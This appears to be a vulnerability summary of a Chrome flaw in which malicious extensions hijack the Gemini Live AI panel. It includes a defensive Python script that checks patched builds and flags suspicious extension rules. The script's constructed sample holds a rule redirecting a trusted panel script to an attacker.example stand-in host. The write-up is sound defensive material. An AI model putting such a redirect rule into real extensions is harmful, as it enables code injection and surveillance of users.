Full Report
High-severity flaw let malicious add-ons access system via browser's embedded AI feature Security boffins have discovered a high-severity bug in Google Chrome that allowed malicious extensions to hijack its Gemini Live AI panel and inherit privileges they were never meant to have.…
Analysis Summary
# Vulnerability: Malicious Chrome Extensions Hijack Gemini Live Panel Privileges
## CVE Details
- CVE ID: CVE-2026-0628
- CVSS Score: Not provided in the text; Google rates the issue "High" on Chrome's own severity scale (Critical/High/Medium/Low), which is not a CVSS vector.
- CWE: Insufficient Isolation/Improper Privilege Management (Inferred)
## Affected Systems
- Products: Google Chrome (Desktop versions)
- Versions: Desktop builds earlier than 143.0.7499.192 / 143.0.7499.193 (the two January 2026 stable-channel builds that carry the fix; the text does not say which platform each build corresponds to).
- Configurations: Systems utilizing the embedded Gemini Live AI panel feature.
## Vulnerability Description
A high-severity flaw in Google Chrome allowed a malicious extension to hijack the Gemini Live AI side panel. The root cause lies in how Chrome applied extension network rules: a rogue extension, even one holding only standard permissions, could get its rules applied to traffic destined for the trusted Gemini panel and thereby intercept and tamper with that traffic. Once the extension injected its own JavaScript into the panel, the script ran with the elevated privileges Chrome grants the Gemini feature, which include reading local files, taking screenshots, and activating the microphone and webcam. The privilege boundary that should have separated ordinary extension code from the trusted panel context was therefore bypassed without any additional permission prompt.
## Exploitation
- Status: The text does not state whether the flaw was exploited in the wild; it was identified and reported by researchers at Palo Alto Networks Unit 42.
- Complexity: Low to medium. The write-up indicates an extension with only standard permissions suffices, so no elevated extension permissions are a prerequisite.
- Attack Vector: Requires a malicious extension to be installed in the victim's browser (local prerequisite); the extension then abuses Chrome's handling of extension network rules to intercept traffic to the Gemini panel. No remote, unauthenticated vector is described.
## Impact
- Confidentiality: High. The injected script inherits the panel's ability to read local files, capture screenshots, and record from the microphone and webcam, so an attacker can sift through local files and observe the user.
- Integrity: High. The script can act on the user's behalf inside the trusted panel, for example slipping phishing messages into the conversation.
- Availability: Low. No direct availability impact is described, although an extension with this level of control could disrupt the browser session.
## Remediation
### Patches
- Google fixed the bug in early January 2026.
- Patches are available in:
- Chrome 143.0.7499.192 (desktop)
- Chrome 143.0.7499.193 (desktop)
### Workarounds
- No temporary workaround is described; updating to a patched desktop build is the required step, and users already on a current version are covered. Because exploitation needs a malicious extension to be installed first, controlling which extensions can be installed (for example, an enterprise extension allowlist) reduces exposure on unpatched machines, though this is a general precaution rather than a mitigation named in the text.
## Detection
- Detection methods specific to this traffic hijacking are not detailed in the summary.
- **Indicator of Compromise (Conceptual):** Unexpected actions originating from the Gemini panel context, such as webcam or microphone activation or unusual local file access, without a corresponding user request; also installed extensions whose network rules redirect or rewrite requests to the trusted panel's origin, since that is the mechanism the flaw relied on.
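The following script is an added example written for this page, not code from Google or from the Unit 42 report. It serves two sections above: the Remediation section's patched-build check, and the Detection section's indicator about extension network rules. It assumes (this is not stated on the page) that the "extension network rules" involved are Chrome's declarativeNetRequest rules, which live as static JSON rulesets referenced from an extension's manifest. The Gemini panel's real origin is not given on the page, so `TRUSTED_PATTERNS` is a placeholder substring list to adjust, and the sample extension, its manifest and its rules are constructed for the demo.

```python
"""Added audit helper (not from the page or Unit 42).

is_patched():          Chrome desktop build at or beyond 143.0.7499.192?
audit_extension_dir(): does an unpacked extension ship static declarativeNetRequest
                       rules that redirect or rewrite requests matching a trusted pattern?
ASSUMPTION: the page's "extension network rules" are declarativeNetRequest rules.
"""
import json
import tempfile
from pathlib import Path

FIRST_FIXED_BUILD = (143, 0, 7499, 192)   # .193 and every later branch compare greater

# Placeholder substrings; replace with the panel's actual origin (assumption).
TRUSTED_PATTERNS = ("gemini",)

# Rule actions that can change what a trusted page receives or sends.
TAMPERING_ACTIONS = {"redirect", "modifyHeaders"}


def parse_version(version: str) -> tuple:
    """'143.0.7499.192' -> (143, 0, 7499, 192); raises ValueError if malformed."""
    parts = tuple(int(p) for p in version.strip().split("."))
    if len(parts) != 4:
        raise ValueError(f"unexpected Chrome version format: {version!r}")
    return parts


def is_patched(version: str) -> bool:
    """True when the build is 143.0.7499.192 or newer (lexicographic tuple compare)."""
    return parse_version(version) >= FIRST_FIXED_BUILD


def rule_condition_text(rule: dict) -> str:
    """Flatten the URL-matching fields of a rule condition for substring checks."""
    cond = rule.get("condition", {})
    fields = [cond.get("urlFilter", ""), cond.get("regexFilter", "")]
    fields += cond.get("requestDomains", []) or []
    fields += cond.get("initiatorDomains", []) or []
    return " ".join(str(f) for f in fields).lower()


def suspicious_rules(rules: list, trusted_patterns=TRUSTED_PATTERNS) -> list:
    """Rules that redirect or modify traffic whose condition matches a trusted pattern."""
    found = []
    for rule in rules:
        action = rule.get("action", {}).get("type")
        text = rule_condition_text(rule)
        if action in TAMPERING_ACTIONS and any(p in text for p in trusted_patterns):
            found.append(rule)
    return found


def audit_extension_dir(ext_dir: Path, trusted_patterns=TRUSTED_PATTERNS) -> list:
    """Scan an unpacked extension's static rulesets; returns a list of finding dicts."""
    manifest = json.loads((ext_dir / "manifest.json").read_text())
    findings = []
    rulesets = manifest.get("declarative_net_request", {}).get("rule_resources", [])
    for res in rulesets:
        rules_path = ext_dir / res.get("path", "")
        if not rules_path.is_file():
            continue
        for rule in suspicious_rules(json.loads(rules_path.read_text()), trusted_patterns):
            findings.append({
                "extension": manifest.get("name", "<unnamed>"),
                "ruleset": res.get("id"),
                "enabled": res.get("enabled", False),
                "rule_id": rule.get("id"),
                "action": rule["action"]["type"],
                "condition": rule.get("condition", {}),
            })
    return findings


# --- constructed sample extension (not a real add-on) ------------------------
SAMPLE_MANIFEST = {
    "manifest_version": 3,
    "name": "Sample Blocker (constructed)",
    "version": "1.0",
    "permissions": ["declarativeNetRequest"],
    "declarative_net_request": {
        "rule_resources": [{"id": "ruleset_1", "enabled": True, "path": "rules.json"}]
    },
}
SAMPLE_RULES = [
    {"id": 1, "priority": 1, "action": {"type": "block"},
     "condition": {"urlFilter": "||ads.example.net^", "resourceTypes": ["script"]}},
    {"id": 2, "priority": 1,   # constructed: swaps a script on a trusted origin
     "action": {"type": "redirect", "redirect": {"url": "https://attacker.example/panel.js"}},
     "condition": {"urlFilter": "||gemini.example/*.js", "resourceTypes": ["script"]}},
]


def build_sample_extension(root: Path) -> Path:
    """Write the constructed manifest and ruleset to disk for the demo."""
    root.mkdir(parents=True, exist_ok=True)
    (root / "manifest.json").write_text(json.dumps(SAMPLE_MANIFEST))
    (root / "rules.json").write_text(json.dumps(SAMPLE_RULES))
    return root


def demo() -> list:
    """Audit the constructed extension in a temp dir; returns its findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_extension_dir(build_sample_extension(Path(tmp) / "ext"))


if __name__ == "__main__":
    for v in ("143.0.7499.191", "143.0.7499.192", "144.0.7600.10"):
        print(v, "patched" if is_patched(v) else "VULNERABLE")
    for f in demo():
        print("suspicious rule:", f)
```

Two caveats when running this against a real profile: only static rulesets are scanned, so rules an extension registers at runtime (dynamic or session rules) will not appear on disk and need to be pulled from the browser's extension state instead; and the version check is a build comparison only, so a build at or above 143.0.7499.192 is treated as fixed without consulting the vendor advisory.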
## References
- Vendor Advisory (Implied): Google Stable Channel Update (January 2026) - link defanged: hxttps://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop.html
- Researcher Disclosure: Unit 42 report - link defanged: hxttps://unit42.paloaltonetworks.com/gemini-live-in-chrome-hijacking/